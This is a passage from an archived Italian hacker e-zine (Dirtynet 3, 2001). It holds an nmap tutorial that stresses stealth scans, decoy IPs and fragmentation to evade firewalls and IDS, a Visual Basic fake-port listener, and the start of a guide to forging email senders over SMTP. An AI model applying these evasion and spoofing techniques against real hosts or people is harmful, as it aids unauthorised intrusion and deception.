Copy Link
Add to Bookmark
Report

Dirtynet 003

eZine's profile picture
Published in 
Dirtynet
 · 5 years ago

  

____ _ _____ _____ __ __ __ _ ____ _____
| _) \| || () )|_ _|\ \/ /| \| || ===||_ _|
|____/|_||_|\_\ |_| |__| |_|\__||____| |_|Numero "3"

-+-+-+//\\ Rivista numero "3" Marzo 2001 //\\-+-+-+

D I R T Y N E T M A G A Z I N E

--=::Inizio Disclaimer::=--

Tutto il contenuto di questo testo è da ritenersi dannoso quindi non applicabile. L'utente è
pregato di non mettere in atto quanto scritto .Esso è solo stato pubblicato per offrire una
conoscenza maggiore in ambito ,NON per altri scopi.Il testo non si puo' modificare ne tanto
meno vendere senza il consenso dell'autore.Se non si rispettano le norme l'utente avrà
commesso azione illegale. In questo testo è solamente presente INFORMAZIONE, e l'informazione
per legge è LEGALE. Leggendo queste righe tu ACCETTI I TERMINI descritti, se ci fosse qualcosa
di contrario alla tua' mente, esci e cancella questo file.

--=::Fine Disclaimer::=--

Finalmente è uscita!


intro attached




--------------------------------------------------------------------------------

Si è concluso un anno ne è incominciato un'altro e rieccoci qui
dinuovo davanti ad uno schermo voi per leggere io per scrivere.
Siamo giunti alla Dirtynet3 grazie agli sforzi e ai sacrifici di
tutti i membri e di tutta quella gente che ha collaborato con noi.

In questo nuovo numero sono presenti molti articoli interessanti
ma che allo stesso tempo richiedono qualche conoscenza.Ci stiamo
impegnando quindi per rendere accessibili a tutti i nostri
testi, infatti come avrete notato in ogni numero è presente una
lista con le rispettive e-mail di tutti gli autori.Questo perchè
il nostro scopo non è solo quello di dare prestigio a questa
rivista ma anche quello (anzi soprattutto) di esporre a tutti le
nostre conoscenze.

Forse molti di voi stanno leggendo questa e-zine solo perchè non
hanno niente di meglio da fare visto che il tempo non è dei
migliori.Questo articolo quindi è dedicato a tutti i miei amici
e a tutte quelle persone che mi stanno vicine tutto l'anno e non
a quella gente che viene da me solo quando ha bisogno di qualcosa.

Finita questo piccolo sfogo tengo a precisare che questo non è
dovuto al mio stato d'animo ma solo al fatto che vorrei cercare
di incominciare l'anno con il piede giusto.
Credo che questa intro vi abbia un po' annoiato (togliamo il po')
quindi vi lascio alla lettura di Dirtynet3.Grazie per l'attenzione.


A[v]a[t]A[r]
H@ team





Ava ti sei sprecato! :=)





(800x600 standard full screen)

ø!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!--!-¡-!-¡-!-¡-!-¡-¹
ø ø
ø INDICE ø
ø ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥¹
º |Titolo| |Autore| º
º º
º º
º --=Hacking=-- (or coding) º
º º
º [NMAP QUESTO SCONOSCIUTO..............................|kEwL.........] º
º [WINUNIX..............................................|Screener_it..] º
º [SENDMAIL E OLTRE.....................................|kEwL.........] º
º [MIRC 5.7 DENIAL OF SERVICE EXPLOITS..................|sYn..........] º
º [STARSCHEDULE 5.1 WEB SERVER DOS......................|Stevens......] º
º [MIMETIZZAZIONE TERMO OTTICA..........................|sYn..........] º
º [GUIDA PRATICA ALL'USO DI IPCHAINS....................|kEwL.........] º
º [SOCKS SCANNER........................................|.............] º
º [WINDOWS 95/98 IGMP FRAGMENT DOS......................|.............] º
º [FAKE MAIL : DI TUTTO DI +............................|A[v]a[t]A[r].] º
º [NAVIGARE CON VB!.....................................|sYn..........] º
º [ATTENTI AL DUCK!.....................................|A[v]a[t]A[r].] º
º [CRONACA DI UN SEMPLICE SITE HACK.....................|Mr. A........] º
º º
º --=Phreaking=-- º
º º
º [INFORMAZIONI GENERALI SUL PROTOCOLLO WAP.............|A[v]a[t]A[r].] º
º [COME T'INFLIPPO LA NUOVA CABINA......................|mR_bIs0n.....] º
º º
º º
º º
º --=Riflessione=-- º
º º
º [RIFLESSIONE..........................................|Jrash........] º
º [INTERNET E REALTA'...................................|Jrash........] º
º º
º º
º --=Mezzing=-- º
º º
º [COME RUBARE UN MOTORINO..............................|Jrash........] º
º [COME MONTARE UN VALIDO ANTIFURTO SUL VOSTRO SCOOTER..|Jrash........] º
º º
º --=Narcoting=-- º
º º
º [MARIA COLTIVATION....................................|phaet........] º
º º
º º
º --=Miscellanea=-- º
º º
º [GUIDA ALLA FACILE INSTALLAZIONE DI WINDOWS 2000......|sYn&Norman^B^] º
º [MONDO SMS............................................|.............] º
º [WRITERS BLOCK (LO STILE).............................|Jrash........] º
º [EFFETTO CON IL MIRC!.................................|NCKxxx.......] º
º º
º º
º [Nella prossima release... ] º
º º
ø!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!--!-¡-!-¡-!-¡-!-¡-¹
ø ø
ø Autori e membri ø
ø con rispettive e-mail ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥¹
º º
º [sYn----------------------------------------syn@hackersat.com-------] º
º [A[v]a[t]A[r]-------------------------------avatar@hackersat.com----] º
º [Screenet_it--------------------------------screener_it@freemail.it-] º
º [Jrash--------------------------------------jrash@hackersat.com-----] º
º [mR_bIsOn-----------------------------------stusciti@yahoo.it-------] º
º [kEwL---------------------------------------kewl@penguinpowered.com-] º
º [Ghent--------------------------------------ghent@hackersat.com-----] º
º [phaet--------------------------------------vesa8_34@yahoo.it-------] º
º [Mr. A--------------------------------------------------------------] º
º AScii by sYn^]|[ & kEwL º


< w w w . h a c k e r s a t . c o m > 10x ALL!


< s[Y]n >

Abbasso BERLUSCONI!


--------------------------------------=:ALLEGATI (=attc=):=------------------------------------



winunix.zip = Progetto e frm del programma "Winnunix" creato da Screener_it.(leggi
testo "WINUNIX" della rivista)

Manuale HTML.zip = un bel file passatomi da mio cugino! Una ottima guida all'HTML.

pezzo1.gif = pezzo puppet del nostro Jrash.

pezzo2.jpg = pezzo del nostro Jrash.

pezzo3.jpg = pezzo del nostro Jrash.(sono un po' ripetitivo?)

root.gif = un'altra immagine, sfizziosa...

----------------------------------------=Hacking=----------------------------------------------


ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø NMAP QUESTO SCONOSCIUTO ø
ø kEwL ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø




NMAP QUESTO SCONOSCIUTO

INTRODUZIONE
Nmap permette agli amministratori di sistema (e non) di analizzare i propri (e
non ;) computers per vedere quali servizi offrono. Con nmap si possono
effettuare diversi tipi di scan come per esempio UDP, TCP connect(), TCP syn e
altri; inoltre nmap fornisce funzioni avanzate come per esempio il rilevamento
del sistema operativo remoto tramite il fingerprint TCP\IP, scanning con decoy,
scanning parallelo, ecc. Il risultato di una scansione con nmap sarà una lista
di porte e il loro attributo. Una porta può essere aperta (open) filtrata
(filtered) o non filtrata (unfiltered). Una porta aperta è una porta che accetta
le connessioni. Una porta filtrata ci fa capire che quella porta è protetta da
un firewall o qualcosa del genere. Una porta non filtrata è quando nmap sa che
la porta è chiusa e non ci sono firewall/filtri che interferiscono con il
tentativo di nmap per determinare lo stato di quella porta.

RIGA DI COMANDO
Ecco la riga di comando che si usa per nmap

nmap [tipo di scan] <opzioni> [HOST]

I campi obbligatori sono il tipo di scan e l'host. Puoi scegliere solo un tipo
di scan per volta mentre puoi inserire tutte le opzioni che vuoi. Ma andiamo a
vedere nel dettagli i vari campi.

TIPI DI SCAN
In questa sezione descriverò i tipi di scan (con il relativo parametro) che nmap
può effettuare.

a. TCP connect() * -sT
Questo è lo scan di base. La chiamata connect() cercherà di stabilire una
connessione TCP completa (3way handshake) con ogni porta dell'host remoto. Se la
porta è in ascolto, connect() avrà successo e la porta verrà segnalata aperta,
altrimenti chiusa. Per eseguire questo scan non hai bisogno dei permessi di
root.

b. Scan TCP SYN * -sS
Questa tecnica è anche conosciuta come scanning "half-open" (mezzo aperto),
perchè non si stabilisce una connessione TCP completa. In pratica questo tipo di
scan manda un pacchetto SYN all'host remoto; se questo risponde con un SYN\ACK,
vuol dire che la porta è aperta, se invece risponde con un RST, la porta è
chiusa. Una volta che abbiamo ricevuto il SYN\ACK, verrà immediatamente mandato
un RST per interrompere la connessione. Pochi host loggheranno questo tipo di
scan, ma per effettuarlo sono necessari i permessi di root.

c. Stealth FIN, Xmas Tree o Null scan * -sF -sX -sN
A volte uno scan SYN non è abbastanza clandestino perchè ci sono dei firewalls o
cose del genere che rintracciano questi scan. Questi tre tipi di scan possono
bypassare questi fastidiosissimi firewalls. L'idea di questi tipi di scan deriva
dal fatto che le porte chiuse rispondono al tuo pacchetto sonda con un RST
mentre le porte aperte ignoreranno il pacchetto in questione. Lo scan FIN manda
pacchetti FIN (ma guarda un po'...); Xmas Tree usa i flags FIN, URF e PUSH; Null
scan infine spegne tutti i flags. Questi tipi di scan funzionano solo con
macchine non windows, poichè la micro$oft ha deciso di ignorare gli standards e
di fare le cose a modo loro.

d. Ping scanning * -sP
Questo tipo di scan serve solo a verificare quali macchine sono attive nella
rete che vogliamo verificare. Normalmente, questo scan avviene mandando un ICMP
echo a ogni indirizzo IP della rete, ma siccome ci sono delle reti che bloccano
i pacchetti ICMP echo (vedi microsoft.com), vengono usati altri 2 metodi per
verificare se una macchina è attiva. Il primo modo è di mandare un pacchetto TCP
ack alla porta 80; se arriva un RST, vuol dire che la macchina è attiva. L'altro
modo è mandare un pacchetto SYN e aspettare un RST o un SYN\ACK. Se non abbiamo
i permessi di root, verrà usato il metodo connect().

e. UDP scan * -sU
Questo metodo viene utilizzato per trovare le porte UDP aperte su un host. Per
fare ciò, il nostro buon nmap manda dei pacchetti udp di 0 byte all'host che ci
interessa. Se riceviamo un messaggio ICMP port unreachable, vuol dire che la
porta è chiusa, altrimenti pensiamo che la porta è aperta.

f. ACK scan * -sA
Questo metodo avanzato serve a rintracciare i rules di un firewall. Questo tipo
di scan manda un pacchetto ACK alle porte specificate. Se riceviamo un RST, la
porta è classeificata come non filtrata (unfiltered); se invece non riceviamo
niente, oppure riceviamo un ICMP unreachable, la porta è classificata filtrata
(filtered). Questo tipo di scan non mostra le porte aperte (open).

g. Window scan * -sW
Molto simile all'ACK scan, a volte rintraccia porte aperte come filtrate o non
filtrate a causa di un'anomalia nella dimensione della finestra TCP in alcuni
sistemi operativi come AIX, UNIX, FreeBSD, OS/2, SunOS 4.x e altri.

h. RCP scan * -sR
Questo metodo lavora in combinazione con gli altri metodi di Nmap. Prende tutte
le porte aperte trovate e le flooda nel tentativo di trovare porte RCP.

i. FTP bounce attack * -b <host FTP>
Sfrutta un FTP come proxy.

OPZIONI GENERALI
Ecco delle opzioni che potrebbero essere utili

-P0 : Non manda ping prima di scansionare un host. Permette la scansione di reti
che non permettono le richieste ICMP echo.
-PT : Usa il TCP ping per determinare gli hosts attivi. Manda un ACK al posto di
un ICMP.
-PS : Usa un pacchetto SYN per determinare gli hosts attivi.
-PI : Usa un ICMP echo per determinare gli hosts attivi.
-PB : E' il tipo di ping predefinito. Usa sia ACK che ICMP.
-O : Rileva il sistema operativo dell'host remoto grazie al TCP\IP fingerprint.
-I : Attiva il TCP reverse ident scanning. Viene interrogato l'identd dell'host
remoto ad ogni porta aperta trovata.
-f : Suddivide l'header TCP in più pacchetti negli scan SYN, FIN, XMAS e NULL,
in modo da non far rintracciare lo scan a firewalls e simili.
-v : Ti informa cosa sta succedendo passo dopo passo. Usalo due volte per un
effetto maggiore.
-h : Mostra una schermata con un aiuto veloce su nmap.
-oN <logfile> : Memorizza i risultati dello scan in un file di log.
-oM <logfile> : Simile a quello di sopra solo che mostra anche i messaggi
d'errore.
-oS <logfile> : Memorizza i risultati dello scan in un file di log con caratteri
speciali.
-resume <logfile> : Recupera uno scan che è stato interrotto da un control-C o
un errore generico. Il file di log deve essere memorizzato o con -oN o con -oM.
-iL <inputfile> : Legge le specifiche dell'obiettivo tramite l'inputfile.
-iR : Dice a nmap di generare da solo degli hosts prendendo numeri a caso.
-p <intervallo di porte> : Specifica l'intervallo di porte (o la porta) che vuoi
scansionare. -p 23 controlla solo la porta 23 mentre -p 1000-2000 controlla le
porta da 1000 a 2000.
-F : Specifica che vuoi scansionare solo le porte specificate nel file dei
servizi distribuito con nmap.
-D <decoy1[,decoy2][,ME],...> : Fa vedere all'host che stai scansionando che lo
scan viene effettuato anche dai decoy (IP) che inserisci. L'IDS vedrà tutti gli
ip che hai inserito e non sarprà da che ip viene realmente lo scan. E' molto
buono per nascondere il tuo indirizzo IP. Puoi usare ME (che sarebbe il tuo IP)
tra i decoys; se lo inserisci tu rispetterà quella posizione, mentre se non lo
inserisci gli verrà assegnata una posizione non definita. Ricordo che i decoys
devono essere indirizzi ip di macchine attive, altrimenti non farai altro che
floodare son dei SYN il tuo obiettivo.
-S <Indirizzo_IP> : In alcuni casi nmap non riconosce il tuo indirizzo IP e
quindi devi specificarlo con questo parametro. Viene usato in combinazione con
-e (che specifica l'interfaccia). Con questo parametro volendo si può anche
cambiare il proprio indirizzo IP ... ma non lo dite a nessuno ;).
-e <interfaccia> : Dice a nmap quale interfaccia manda e riceve i pacchetti.
-g <numero di porta> : Specifica la porta sorgente da cui vengono effettuate le
connessioni per il port scan.
-r : Dice a nmap di non scansionare le porte a casaccio.
--randomize_hosts : Dice a nmap di mischiare ogni gruppo fino a 2048 hosts prima
di scansionarli. Questo può rendere le scansioni meno ovvie ai vari NIDS.
-M <max_sockets> : Setta il numero massimo di socket che devono essere usati in
uno scan TCP connect(); questo rallenterà un po' lo scan ma saremo sicuri che le
macchine remote non crasheranno.

OPZIONI DI TEMPO
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> : E' la velocità della
scansione. Paranoid scansiona *molto* lentamente per evitare di essere
rintracciati dagli IDS; aspetta 5 minuti prima di mandare i pacchetti. Sneaky è
simile, solo che aspetta 15 secondi prima di mandare i pacchetti. Polite aspetta
0.4 secondi prima di mandare i pacchetti ed è probabile che la macchina remota
non crashi. Normal è il comportamento standard di nmap, e manda i pacchetti
appena possibile, senza sovraccaricare la rete. Aggressive aggiunge un timeout
di 5 minuti per ogni host e non aspetta mai più di 1.25 secondi per controllare
le risposte. Insane è fatto solo per reti veloci; aggiunge un timeout di 75
secondi e aspetta solo 0.3 secondi per le risposte. Puoi usare anche i numeri al
posto delle parole (0=Paranoid,...,5=Insane).
--hosts_timeout <millisecondi> : Specifica quanto tempo nmap deve aspettare
prima di lasciar perdere quell'IP.
--max_rtt_timeout <millisecondi> : Specifica quanto tempo nmap deve aspettare
per controllare la risposta prima di rispondere.
--min_rtt_timeout <millisecondi> : Aspetta almeno il tempo prestabilito prima di
lasciar perdere una risposta.
--initial_rtt_timeout <millisecondi> : Specifica il timeout iniziale di
risposta.
--max_parallelism <numero> : Specifica quanti scan può effettuare nmap in
parallelo.
--scan_delay <millisecondi> : Specifica l'intervallo di tempo minimo che nmap
deve aspettare tra le risposte.

COME SI SCRIVE UN OBIETTIVO?
Tutto quello che non è un'opzione, per nmap è un obiettivo. Puoi specificare
solo un indirizzo IP, come per esempio 212.216.145.12, oppure puoi specificare
anche delle sottoreti, scrivendo 212.216.145.12/MASK. Una mask può essere 0
(scansiona tutto internet), 16 (scansiona indirizzi di classe B, 24 (scansiona
indirizzi di classe C) e 32 (scansiona solo quell'indirizzo IP). Al posto della
mask si possono usare anche gli asterischi. Infatti puoi scansionare range di IP
scrivendo, per esempio, 212.216.*.*. Al posto di usare gli asterischi si possono
usare anche altri modi, come per esempio 212.216.0-255.0-255 (che è la stessa
cosa che abbiamo scritto prima).

ESEMPI
Allora...dopo aver scritto tutto sto papocchio facciamo qualche esempio pratico.
Cominciamo a fare uno scan TCP connect(), all'indirizzo 194.195.25.35 (per
esempio). Scriviamo:

nmap -sT 194.195.25.35

Facile no? Se volevamo fare uno scan SYN? Basta sostituire -sS a -sT ed il gioco
è fatto! E se per esempio vogliamo sapere il sistema operativo del computer
remoto? Niente di più facile! Aggiungiamo il parametro -O. E se per esempio
vogliamo fare uno scan con dei decoys? Non bisogna far altro che aggiungere -D
212.216.123.2,213.213.7.50,194.184.26.54,210.212.190.5 (per esempio) ed il gioco
è fatto (consiglio di mettere sempre almeno 5 decoys). Potete effettuare
migliaia di tipi di scan combinando le moltissime opzioni che nmap mette a
disposizione.

Bene ora che sapete cos'è nmap e sapete come si usa (almeno lo spero! ;) andate
a scaricarlo a http://www.insecure.org/nmap e buon divertimento! Se avete
qualche domanda da farmi o se volete correggermi o semplicemente se vi sto
antipatico/simpatico non esitate a mandarmi un'email. Grazie per l'attenzione!
Alla prox...byeeeeeee! ;P


kEwL` <kewl@penguinpowered.com>


ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø WINUNIX ø
ø Screener_it ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø



*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Autore: Screener_it
email: screener_it@freemail.it
URL: www.tankcommandos.org
DATA: 07/01/01

*/
*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Le caxxate che si dicono in giro per la rete sono tante. Tantissime !!
Dalle leggende metropolitane, ai giudizi affrettati, alle idee fisse
nella mente di chi ha sentito solo una campana..
Di leggende metropolitane ne avete sentite anche troppe, giudizi affrettati
anche..
Le idee fisse cosa sono ? Sono le idee messe in giro da una minoranza che sono
poi diventate il pensiero della massa..
La più classica è che per forza chi è un hacker è un anarchico. E allora giù
con i ragazzini che riempiono i loro siti di stemmi anarchici credendo che
così sono molto più underground.
Un'altra idea fissa è quella che odio di più: Visual Basic è un linguaggio da
lamer..
E questo perchè ?? Semplice, è un prodotto della Microsoft e quindi tutto quello
che è Microsoft = lamer.
Dimenticando che Ms-Dos è un frutto della MS, dimenticando che il 99% ha iniziato
a usare il pc con Windows ( 3.1, 95, 98, ..).
Alzi la mano (scriva 'na mail) chi ha iniziato a usare il pc installandosi Linux
da solo !!!!!!!!!!!!
E' vero, alcuni prodotti della MS sono discutibili, prezzi vergognosi, però..
Diamo alla MS quello che è della MS !!!

Visual Basic non è un linguaggio più avanti, è verissimo !!
E' pur sempre vero che con poche righe di comandi si possono fare programmi
eccellenti. Ho aggiunto una campana al coro. Ascoltatele tutte prima di farvi
una vostra idea !!!

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Oggi parleremo di come creare WinUnix !!
E che caxxo è WinUnix ?? WinUnix è un programma nato dalla mia mente malata per
confondere gli avversari che mi fanno scanning, per avvertirmi di tentativi
di connessione, ecc..

Questo programma infatti apre porte classiche di un sistema Unix-like
( telnet su tutte ) o cmq porte non usuali su un computer casalingo
( POP3, SMTP, finger, ecc..) e così a un eventuale scanning l'attaccante si troverebbe
in difficoltà a riconoscere un sistema Windows..
In più in caso di scanning / tentativi di connessione mi avverte indicandomi l'ip
dell'attaccante e la porta a cui ha provato a collegarsi !!

Di cosa abbiamo bisogno per creare questo programmino ???
Poca roba:
1.- Visual Basic 5 (o succ.)
2.- Un po' di esperienza in Vb non guasta (ma possiamo farne a meno).

*/
*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Allora, cominciamo..
Prendete Visual Basic e versatelo in un recipiente abbastanza capiente e iniziate
a mescolare.. No, caxxo, ho sbagliato guida !!

Prima due paroline su cosa faremo. Questo programma si metterà in ascolto sulle seguenti
porte:
23 (telnet)
25 (SMTP)
79 (finger)
110 (POP3)
E fin qui ci siamo. Una cosa in più: queste porte nella realtà usano il protocollo TCP.
Come ben sapete in rete esistono principalmente due protocolli: il TCP e l'UDP.
Una certa differenza tra i due c'è, spiegarla qui è inutile, cmq sappiate che il più
usato è il TCP, che è anche il più sicuro, xkè, al contrario dell'UDP, controlla che
i dati siano arrivati a destinazione, mentre l'UDP lancia i dati e.. Se arrivano bene,
se non arrivano..
Cmq dato che vogliamo essere il più vicino possibile alla realtà useremo anche noi il
protocollo TCP per questo progetto.

Per creare applicazioni Visual Basic che interagiscono con le potenzialità di Internet
abbiamo bisogno di un componente particolare di Visual Basic !
Il suo nome è Winsock e si carica in Visual Basic semplice andando in
Progetto / Componenti e dall'elenco che appare selezionare "Microsoft Winsock Control" e poi
cliccare Ok.
Se andate nella barra degli strumenti a sinistra vedrete che ora è apparso un disegnino con
due computer. Se ci andate sopra vedrete la scritta "Winsock".
Perfetto..
Ora si tratta di aggiungere questo componente alla nostra form. Cliccate sopra quel
disegnino di prima e poi portatelo nel form. Perfetto !!
Nella form apparirà questo disegnino con il nome di Winsock1.

Ma cos'è il Winsock ?? Il Winsock non è altro che un componente di Visual Basic che funziona
in modo simile a telnet. Esso infatti può creare una connessione tra due pc, spedire
stringhe di dati da un pc all'altro, ecc..

Capito ? Bene. Andate a destra, dove vedete un finestra con il titolo "Propietà".
Prima cosa vedete la propietà (Name). Per non fare confusione lo chiameremo TCP1.
Scorrete l'elenco e arrivate fino alla propietà Protocol e controllate che siano
impostate su sckTCPProtocol, ok ??

Ogni porta del nostro progetto ha bisogno di un componente Winsock, quindi sulla form dobbiamo
crearne quattro. Che chiameremo TCP1, TCP2, TCP3, TCP4. Ok ??? Sono importanti i nomi,
altrimenti
più avanti non capirete niente !!

Inserite poi:
1 label con nome "lblip"
1 label con nome "lblporta"
entrambe devono essere vuote.

Ok, adesso passiamo al codice vero e proprio. Fate doppio clic su un punto qualsiasi
della form
e vi apparirà la scritta:

Private Sub Form_Load()

End Sub

che voi completerete in questo modo:

Private Sub Form_Load()
TCP1.LocalPort = Val(23)
TCP1.Listen
TCP2.LocalPort = Val(25)
TCP2.Listen
TCP3.LocalPort = Val(79)
TCP3.Listen
TCP4.LocalPort = Val(110)
TCP4.Listen
End Sub

Che abbiamo fatto ?? Semplice !! Ogni volta che il programma parte automaticamente i quattro
Winsock che abbiamo messo nel form si metteranno in ascolto sulle porte decise da noi.

TCP1.LocalPort = Val(23)
Questa riga serve per indicare al controllo TCP1 su quale porta operare (in questo caso la 23).

TCP1.Listen
Questa riga serve ad indicare al controllo TCP1 cosa fare.. In questo mettersi in ascolto
sulla porta che prima abbiamo indicato.

Ok, adesso le porte sono in ascolto.. E adesso che facciamo ???? Dobbiamo dire ai vari
protocolli come comportarsi in caso di connessione..

Quindi nel codice della form aggiungete questa riga:

Private Sub TCP1_ConnectionRequest(ByVal requestID As Long)

End Sub

In mezzo a questa righe dovete dire al controllo come comportarsi in caso di richiesta di
connessione.Noi vogliamo che quando c'è un tentativo di connessione ci avverta indicandoci
l'ip dell'attaccante e la porta alla quale ha tentato di attaccarsi !!
Quindi:

Private Sub TCP1_ConnectionRequest(ByVal requestID As Long)
lblip = TCP1.RemoteHostIP
lblporta = "23"
TCP1.Close
TCP1.LocalPort = Val(23)
TCP1.Listen
End Sub

Un po' di spiegazioni ve le devo, eh ?? Allora.. In caso di tentativo di connessione alla
controllo TCP1 (che controlla la porta 23) nella casella lblip apparirà l'ip dell'attaccante:
lblip = TCP1.RemoteHostIP
E nella casella lblporta apparirà la porta alla quale ha tentato di collegarsi.. In questo
caso la 23.

Dopodiche che succede ?? Dopo averci informato dell'attacco il programma ci difende
dall'attaccante, chiudendogli la connessione con il nostro pc:
TCP1.close
E poi si rimette in ascolto sulla stessa porta in attesa di nuovi attacchi..

Facciamo lo stesso lavora sul controllo TCP2...

Private Sub TCP2_ConnectionRequest(ByVal requestID As Long)
lblip = TCP2.RemoteHostIP
lblporta = "25"
TCP2.Close
TCP2.LocalPort = Val(25)
TCP2.Listen
End Sub

E poi sugli altri controlli...

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

I codici principali del programma si chiudono qui, ma evidentemente ha bisogno di qualche
ritocco.. Infatti per adesso il programma funziona ma è molto rozzo.. Vi troverete a una
form grigia che quando c'è una connessione diventa così:
____________________
| |
| |
| 192.132.134.135 |
| 25 |
|____________________|

Direi che è piuttosto misera.. Aggiungiamo un po' di roba..
Prima di tutto un label con la scritta:"Ip attaccante:" e una con scritto "Porta:"
Mh.. Sì, meglio ma ha bisogno di qualche ritoccatina.. Sarebbe meglio che vediamo la
form solo qualche veniamo "attaccati".. Imposta la propietà visible della form
su false..
Vogliamo che appaia solo quando nella casella lblip appare un ip.. Giusto ?
Che appaia in primo piano per avvertirci del pericolo..
Mo
Ecco qui il codice:

Private Sub lblip_Change()
If lblip = "" Then Me.Visible = False Else lblip.Visible = True
SetWindowPos Me.hWnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOACTIVATE Or SWP_SHOWWINDOW Or !!
SWP_NOMOVE Or SWP_NOSIZE
End sub

E nelle dichiarazioni mettete questi codici:

Const HWND_TOPMOST = -1
Const HWND_NOTOPMOST = -2
Const SWP_NOSIZE = &H1
Const SWP_NOMOVE = &H2
Const SWP_NOACTIVATE = &H10
Const SWP_SHOWWINDOW = &H40
Private Declare Sub SetWindowPos Lib "User32" (ByVal hWnd As Long, ByVal hWndInsertAfter As !!
Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As
Long)

Dove vedete i punti di esclamazione ( !! ) è xkè dovete mettere tutto su una riga nel
programma, non andare a capo come ho fatto io..

Poi ci aggiungiamo un pulsantino ( command1 ) che se cliccato fà diventare la form di nuovo
invisibile:

Private Sub Command1_Click()
lblip = ""
lblbporta = ""
me.Visible = False
End Sub

*/
*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Ok, io avrei finito.. Se non avete chiaro qualcosa insieme alla rivista dovrebbero esserci
allegati i sorgenti scritti in Vb 6 di questo programma.
Se ancora avete dubbi sendatemi una mail: screener_it@freemail.it

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Finito !! Un saluto particolare a:
- Tutti quelli che scrivono su Dirty Net
- I ragazzi di #hackersonline su AzzurraNet e #hack.it su irc.tin.it
- Syn^, Spyro, MrWolf, Bakunin, BigAlex, Tripping, GreenDragon
- Tutti quelli che si sono visti il derby Milan - Inter del 07/01 che io vedrò stasera a
casa mia (volevo andare anch'io, non è giusto !!!)
- A Fabrizio, il primo anarchico-leghista della storia !! :))))

*/
*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\






ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø SENDMAIL E OLTRE ø
ø kEwL ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø




===========================================================
Sendmail e oltre: Consigli di Ankit Fadia ankit@bol.net.in
===========================================================

Benvenuto a un altro manuale delle Verità sull’Hacking. Benchè questo manuale viene dopo un
lungo periodo di pausa, è molto bello tornare a scrivere per l’HT. Comunque, nel passato,
abbiamo avuto un numero di spiegazioni su come mandare email false, come giocare con il demone
Sendmail, gli headers delle email e tutto quello che si può fare con SMTP (Simple Mail
Transfer Protocol) e email. Benchè questo manuale mette troppo in luce la materia trattata, è
comunque più mirato su consigli avanzati e altre informazioni poco comuni ma molto utili.
Ora, abbiamo già imparato come si fa, telnettarsi alla porta 25 di un server mail e mandare un
email (anche un’email falsa) scrivendo semplicemente alcuni comandi SMTP. Comunque,
per il beneficio dei dilettanti e di rinfrescare la memoria delle persone pratiche ma
smemorate, ripercorreremo velocemente tutto il processo. Prometto di renderlo quanto più
breve è possibile, allo stes-so tempo facile da capire.
La porta 25 è la Porta Sendmail dove è eseguito il demone SMTP. Questo demone è infatti il
demone che gestisce la posta in uscita. Tutti i client email mandano le email connettendosi
alla porta 25 di un server email ed emettendo i comandi SMTP. Questo processo è automatizzato
e viene eseguito in background. Comunque, ognuno può manualmente connettersi (telnet) alla
porta 25 di un server mail e manualmente scrivere i comandi SMTP in modo da mandare le email.
Ripoterò i comandi di base. Per dettagli riguardanti l’uso individuale dei comandi, scrivi
semplicemente la parola ‘help’ seguita dal comando al prompt di Sendmail.
Nota: L’esempio seguente manda una mail da ankit@bol.net.in a namitas@bol.net.in emettendo i
comandi SMTP al server mail: mail.isp.com. Le risposte del server mail hanno un numero che
precede esse mentre i comandi scritti dall’utente non hanno numeri.

***********************************************************************************************
C:\windows>telnet mail.isp.com
220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec 2000 17:18:50 +0530
(IST)
helo ankit.com
250-mail.isp.com Hello [203.xx.yyy.91], pleased to meet you
mail from: ankit@bol.net.in
250 ankit@bol.net.in... Sender ok
rcpt to: namitas@bol.net.in
